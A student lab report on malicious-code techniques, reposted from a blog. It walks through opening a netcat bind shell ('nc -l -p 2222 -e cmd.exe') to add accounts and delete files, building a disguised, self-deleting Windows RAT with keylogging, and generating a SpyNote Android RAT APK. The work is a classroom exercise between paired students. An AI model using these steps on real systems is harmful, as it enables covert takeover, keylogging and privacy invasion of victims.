码迷,mamicode.com
首页 > 其他好文 > 详细

实验四

时间:2019-12-23 14:59:13      阅读:139      评论:0      收藏:0      [点我收藏+]

标签:信息技术   设置   ali   内容   描述   实训   账户   一个   卸载   

Chinese people public security university

 

网络对抗技术

实验报告

 

实验四

恶意代码技术

 

 

 

学生姓名

车孟博

年级

2017级

区队

网安四区

指导教师

高见

 

 

信息技术与网络安全学院

2016117

 

实验任务总纲

2016—2017 学年 第  学期

一、实验目的

1.通过对木马的练习,使读者理解和掌握木马传播和运行的机制;通过手动删除木马,掌握检查木马和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范意识。

 

2.了解并熟悉常用的网络攻击工具,木马的基本功能;

3.达到巩固课程知识和实际应用的目的。

二、实验要求

1.认真阅读每个实验内容,需要截图的题目,需清晰截图并对截图进行标注和说明。

2.文档要求结构清晰,图文表达准确,标注规范。推理内容客观、合理、逻辑性强。

3.软件工具可使用NC、MSF等。

4.实验结束后,保留电子文档。

、实验步骤

1.准备

提前做好实验准备,实验前应把详细了解实验目的、实验要求和实验内容,熟悉并准备好实验用的软件工具,按照实验内容和要求提前做好实验内容的准备。

2.实验环境

描述实验所使用的硬件和软件环境(包括各种软件工具);

开机并启动软件office2003或2007、浏览器、加解密软件。

3.实验过程

1)启动系统和启动工具软件环境。

2)用软件工具实现实验内容。

4.实验报告

按照统一要求的实验报告格式书写实验报告。把按照模板格式编写的文档嵌入到实验报告文档中,文档按照规定的书写格式书写,表格要有表说图形要有图说。

 

任务一 利用NC控制电脑

 NetCat,具有网络军刀之称,它小巧精悍且功能强大,说它小巧精悍,是因为他的软件大小现在已经压缩到只有十几KB,而且在功能上丝毫不减。

 实验过程需要两个同学相互配合完成:

 步骤一:在两台主机里都下载netcat这个软件 之后

在受害者的机器 (同学A)
输入下面的命令:
  nc.exe -l -p 2222 -e cmd.exe,进入监听模式,将2222端口打开

技术图片

步骤二:
在攻击者的机器.(同学B)
输入下面的命令:
  nc ip  port //连接victim_IP,然后得到一个shell。 (需要截图)

可以发现 当命令进入后,攻击者通过shell就控制了受害者的机器,就可以在其上进行各种操作

 技术图片

步骤三: 在shell中,利用net user 用户名 密码 /add ,添加一个用户jkn,并在受害者的机器中使用 net user 命令进行验证。(需要截图)

 技术图片

技术图片

可以继续通过命令行做一些事情:比如删除文件等等,由于我将shell状态不小心退出了,因此只能简要叙述一下删除文件的过程,比如先通过dir查看c盘下的文件,只有利用del命令就可以将其删除;

 任务二 利用木马控制电脑

实验过程需要两个同学配合:

 步骤一:

  在攻击者的机器的机器上用上兴远程控制生成一个名为QQjkn.exe的木马,图标换成腾讯新闻的图标以混淆,此外,安装路径设在C盘,即木马运行后就会安装在受害者的C盘上,选择安装后自删除,即一旦双击图标,该木马图标就会消失,此外,服务名称和服务显示器名称都可以修改。

 技术图片
将生成的木马可执行程序拷贝到受害者的机器,并双击运行。 

 技术图片

在控制端中查看木马上线情况,并对以下功能每个进行测试和截图。 

1.可以发现生成的木马点击后运行在C盘中

技术图片

 2.文件管理,可以直接访问到被控端的主机,将其文件进行生成、复制、删除等操作,图中我是在通过上兴远程控制的控制端在受害主机里生成了一个shibai文件夹,然后去受害主机里查看

技术图片

屏幕控制,尝试获取桌面,通过控制端直接进入其命令行,可以增加账户或者删除账

技术图片

技术图片

3、键盘记录,尝试获取对方击键记录,上兴远程控制的系统管理有该功能 ,直接查看即可

技术图片

4.会话管理,重启对方机器,查看是否能自启动上线

技术图片

技术图片

 

会话管理,卸载对方的木马。

 技术图片

 任务三 Android远控实践  所有过程截图写博客

实验步骤:

先将试验所需的软件及环境都安装好,通过百度云得到spynote的软件、去360软件管家就可以下载.net framework环境,之后夜神模拟器是上次网络实训中就用的软件,直接就可以使用

一、攻击者打开spynote软件,该软件需要先安装.netframework4.0和jdk环境。

 技术图片

 二、配置并打开监听端口

 点击Listen Port,在弹出的对话框中输入端口号,并点击Add按钮,最后点击OK,成功监听本地端口。【本过程选用3210端口】

 三、配置并生成木马

(1)点击Build Client按钮,弹出对话框

 技术图片

(2)配置回连IP和端口,IP地址填写运行spynote的机器IP,端口填写监听的端口号,本次填写3210端口。

 技术图片

(3)配置相关属性信息。

 技术图片

    (4)最后点击Build按钮,在选择框中选择和spynote同处在一个文件夹中Patch-release.apk。

技术图片

    (5)完成后,自动打开APK生成所在的文件夹。

 技术图片

四、将木马安装在夜神模拟器中,是一个显示unknown的图标,为什么叫做unknown呢?因为我在生成这个木马的时候,将APP name设置为unknown.

 技术图片

五、在Spynote中控制手机

可以在spynote中看到有一台机器上线,并可以查看其基本信息,是我之前使用夜神模拟器留下的注册信息

 技术图片

在该机器中右键,可以看到可以对该机器进行控制的功能,从中选择4个以上的项目进行实验。

 技术图片

1.选择phone功能,即实验,可以发现打不通,但确实通过spy端控制了手机模拟器

技术图片

2.chat功能,直接对话

技术图片

实验四

标签:信息技术   设置   ali   内容   描述   实训   账户   一个   卸载   

原文地址:https://www.cnblogs.com/P201721440030/p/12083538.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!